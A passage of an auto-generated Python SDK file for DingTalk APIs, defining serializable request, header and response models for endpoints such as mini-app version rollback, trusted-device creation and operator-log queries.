return self
class GetUserAppVersionSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetUserAppVersionSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
        # list of user app-version distribution entries
        self.data = data
        # paging cursor for the next request
        self.next_token = next_token
        # whether more data is available
        self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetUserAppVersionSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetUserAppVersionSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetUserAppVersionSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetUserAppVersionSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class DeleteCommentHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class DeleteCommentResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class ListMiniAppHistoryVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListMiniAppHistoryVersionRequest(TeaModel):
def __init__(
self,
page_size: int = None,
page_number: int = None,
mini_app_id: str = None,
):
        # page size
        self.page_size = page_size
        # page number
        self.page_number = page_number
        # mini-app id
        self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class ListMiniAppHistoryVersionResponseBodyList(TeaModel):
def __init__(
self,
package_url: str = None,
package_size: str = None,
build_status: int = None,
version: str = None,
h_5bundle: str = None,
):
        # package URL
        self.package_url = package_url
        # package size
        self.package_size = package_size
        # build status
        self.build_status = build_status
        # version
        self.version = version
        # h5Bundle URL
        self.h_5bundle = h_5bundle
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.package_url is not None:
result['packageUrl'] = self.package_url
if self.package_size is not None:
result['packageSize'] = self.package_size
if self.build_status is not None:
result['buildStatus'] = self.build_status
if self.version is not None:
result['version'] = self.version
if self.h_5bundle is not None:
result['h5Bundle'] = self.h_5bundle
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('packageUrl') is not None:
self.package_url = m.get('packageUrl')
if m.get('packageSize') is not None:
self.package_size = m.get('packageSize')
if m.get('buildStatus') is not None:
self.build_status = m.get('buildStatus')
if m.get('version') is not None:
self.version = m.get('version')
if m.get('h5Bundle') is not None:
self.h_5bundle = m.get('h5Bundle')
return self
class ListMiniAppHistoryVersionResponseBody(TeaModel):
def __init__(
self,
list: List[ListMiniAppHistoryVersionResponseBodyList] = None,
):
# result
self.list = list
def validate(self):
if self.list:
for k in self.list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['list'] = []
if self.list is not None:
for k in self.list:
result['list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.list = []
if m.get('list') is not None:
for k in m.get('list'):
temp_model = ListMiniAppHistoryVersionResponseBodyList()
self.list.append(temp_model.from_map(k))
return self
class ListMiniAppHistoryVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListMiniAppHistoryVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListMiniAppHistoryVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetDocCreatedDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDocCreatedDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
        # starting cursor for paging through the data
        self.next_token = next_token
        # number of records per page
        self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetDocCreatedDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
doc_created_cnt: str = None,
):
        # department id
        self.dept_id = dept_id
        # department name
        self.dept_name = dept_name
        # cumulative number of DingTalk docs created in the last day
        self.doc_created_cnt = doc_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.doc_created_cnt is not None:
result['docCreatedCnt'] = self.doc_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('docCreatedCnt') is not None:
self.doc_created_cnt = m.get('docCreatedCnt')
return self
class GetDocCreatedDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetDocCreatedDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
        # per-department count of docs created by users
        self.data = data
        # paging cursor for the next request
        self.next_token = next_token
        # whether more data is available
        self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetDocCreatedDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetDocCreatedDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDocCreatedDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDocCreatedDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CreateTrustedDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CreateTrustedDeviceRequest(TeaModel):
def __init__(
self,
user_id: str = None,
platform: str = None,
mac_address: str = None,
status: int = None,
):
# Employee userId
self.user_id = user_id
# Platform type
self.platform = platform
# MAC address
self.mac_address = mac_address
# Device status
self.status = status
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_id is not None:
result['userId'] = self.user_id
if self.platform is not None:
result['platform'] = self.platform
if self.mac_address is not None:
result['macAddress'] = self.mac_address
if self.status is not None:
result['status'] = self.status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('platform') is not None:
self.platform = m.get('platform')
if m.get('macAddress') is not None:
self.mac_address = m.get('macAddress')
if m.get('status') is not None:
self.status = m.get('status')
return self
class CreateTrustedDeviceResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class CreateTrustedDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateTrustedDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateTrustedDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
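# Serialization sketch (field values are made up): to_map() emits the camelCase
# wire keys declared above, and from_map() hydrates a model back from such a dict.
#
#   req = CreateTrustedDeviceRequest(user_id='u01', platform='WINDOWS',
#                                    mac_address='00:11:22:33:44:55', status=1)
#   wire = req.to_map()   # {'userId': 'u01', 'platform': 'WINDOWS', ...}
#   assert CreateTrustedDeviceRequest().from_map(wire).user_id == 'u01'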
class GetPartnerTypeByParentIdHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetPartnerTypeByParentIdResponseBodyData(TeaModel):
def __init__(
self,
type_id: float = None,
type_name: str = None,
):
# Child tag ID
self.type_id = type_id
# Child tag name
self.type_name = type_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.type_id is not None:
result['typeId'] = self.type_id
if self.type_name is not None:
result['typeName'] = self.type_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('typeId') is not None:
self.type_id = m.get('typeId')
if m.get('typeName') is not None:
self.type_name = m.get('typeName')
return self
class GetPartnerTypeByParentIdResponseBody(TeaModel):
def __init__(
self,
data: List[GetPartnerTypeByParentIdResponseBodyData] = None,
):
# List of child tags
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetPartnerTypeByParentIdResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetPartnerTypeByParentIdResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetPartnerTypeByParentIdResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetPartnerTypeByParentIdResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SetDeptPartnerTypeAndNumHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SetDeptPartnerTypeAndNumRequest(TeaModel):
def __init__(
self,
dept_id: str = None,
partner_num: str = None,
label_ids: List[str] = None,
):
# Department ID
self.dept_id = dept_id
# Partner code
self.partner_num = partner_num
# List of partner type IDs
self.label_ids = label_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.label_ids is not None:
result['labelIds'] = self.label_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('labelIds') is not None:
self.label_ids = m.get('labelIds')
return self
class SetDeptPartnerTypeAndNumResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetActiveUserSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetActiveUserSummaryResponseBody(TeaModel):
def __init__(
self,
act_usr_cnt_1m: str = None,
):
# Number of monthly active users
self.act_usr_cnt_1m = act_usr_cnt_1m
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.act_usr_cnt_1m is not None:
result['actUsrCnt1m'] = self.act_usr_cnt_1m
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('actUsrCnt1m') is not None:
self.act_usr_cnt_1m = m.get('actUsrCnt1m')
return self
class GetActiveUserSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetActiveUserSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetActiveUserSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetOaOperatorLogListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetOaOperatorLogListRequest(TeaModel):
def __init__(
self,
op_user_id: str = None,
start_time: int = None,
end_time: int = None,
page_number: int = None,
page_size: int = None,
category_list: List[str] = None,
):
# Operator userId
self.op_user_id = op_user_id
# Start time
self.start_time = start_time
# End time
self.end_time = end_time
# Starting page number for pagination
self.page_number = page_number
# Page size
self.page_size = page_size
# Operation categories (level-1 directory)
self.category_list = category_list
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.op_user_id is not None:
result['opUserId'] = self.op_user_id
if self.start_time is not None:
result['startTime'] = self.start_time
if self.end_time is not None:
result['endTime'] = self.end_time
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.category_list is not None:
result['categoryList'] = self.category_list
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('opUserId') is not None:
self.op_user_id = m.get('opUserId')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('categoryList') is not None:
self.category_list = m.get('categoryList')
return self
class GetOaOperatorLogListResponseBodyData(TeaModel):
def __init__(
self,
op_user_id: str = None,
op_name: str = None,
op_time: int = None,
category_1name: str = None,
category_2name: str = None,
content: str = None,
):
# Operator userId
self.op_user_id = op_user_id
# Operator name
self.op_name = op_name
# Operation time
self.op_time = op_time
# Operation category (level 1)
self.category_1name = category_1name
# Operation category (level 2)
self.category_2name = category_2name
# Operation details
self.content = content
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.op_user_id is not None:
result['opUserId'] = self.op_user_id
if self.op_name is not None:
result['opName'] = self.op_name
if self.op_time is not None:
result['opTime'] = self.op_time
if self.category_1name is not None:
result['category1Name'] = self.category_1name
if self.category_2name is not None:
result['category2Name'] = self.category_2name
if self.content is not None:
result['content'] = self.content
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('opUserId') is not None:
self.op_user_id = m.get('opUserId')
if m.get('opName') is not None:
self.op_name = m.get('opName')
if m.get('opTime') is not None:
self.op_time = m.get('opTime')
if m.get('category1Name') is not None:
self.category_1name = m.get('category1Name')
if m.get('category2Name') is not None:
self.category_2name = m.get('category2Name')
if m.get('content') is not None:
self.content = m.get('content')
return self
class GetOaOperatorLogListResponseBody(TeaModel):
def __init__(
self,
data: List[GetOaOperatorLogListResponseBodyData] = None,
item_count: int = None,
):
self.data = data
# Number of records returned by this query
self.item_count = item_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.item_count is not None:
result['itemCount'] = self.item_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetOaOperatorLogListResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('itemCount') is not None:
self.item_count = m.get('itemCount')
return self
class GetOaOperatorLogListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetOaOperatorLogListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetOaOperatorLogListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
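# Query sketch (assumption: the start/end times are epoch-millisecond
# timestamps, which should be verified against the endpoint docs; the category
# value is hypothetical): paging an operator's audit log over a time window.
#
#   req = GetOaOperatorLogListRequest(
#       op_user_id='manager01',
#       start_time=1609430400000,
#       end_time=1609516800000,
#       page_number=1,
#       page_size=50,
#       category_list=['org'],
#   )
#   payload = req.to_map()  # ready to send as the request body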
class RollbackMiniAppVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class RollbackMiniAppVersionRequest(TeaModel):
def __init__(
self,
ding_isv_org_id: int = None,
ding_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
rollback_version: str = None,
target_version: str = None,
mini_app_id: str = None,
):
self.ding_isv_org_id = ding_isv_org_id
self.ding_org_id = ding_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
# Version being rolled back
self.rollback_version = rollback_version
# Target version to roll back to
self.target_version = target_version
# Mini-app ID
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.rollback_version is not None:
result['rollbackVersion'] = self.rollback_version
if self.target_version is not None:
result['targetVersion'] = self.target_version
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('rollbackVersion') is not None:
self.rollback_version = m.get('rollbackVersion')
if m.get('targetVersion') is not None:
self.target_version = m.get('targetVersion')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class RollbackMiniAppVersionResponseBody(TeaModel):
def __init__(
self,
code: int = None,
cause: str = None,
):
# Result code
self.code = code
# Failure reason
self.cause = cause
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.code is not None:
result['code'] = self.code
if self.cause is not None:
result['cause'] = self.cause
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('code') is not None:
self.code = m.get('code')
if m.get('cause') is not None:
self.cause = m.get('cause')
return self
class RollbackMiniAppVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: RollbackMiniAppVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = RollbackMiniAppVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class PublishFileChangeNoticeHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class PublishFileChangeNoticeRequest(TeaModel):
def __init__(
self,
file_id: str = None,
space_id: str = None,
operator_union_id: str = None,
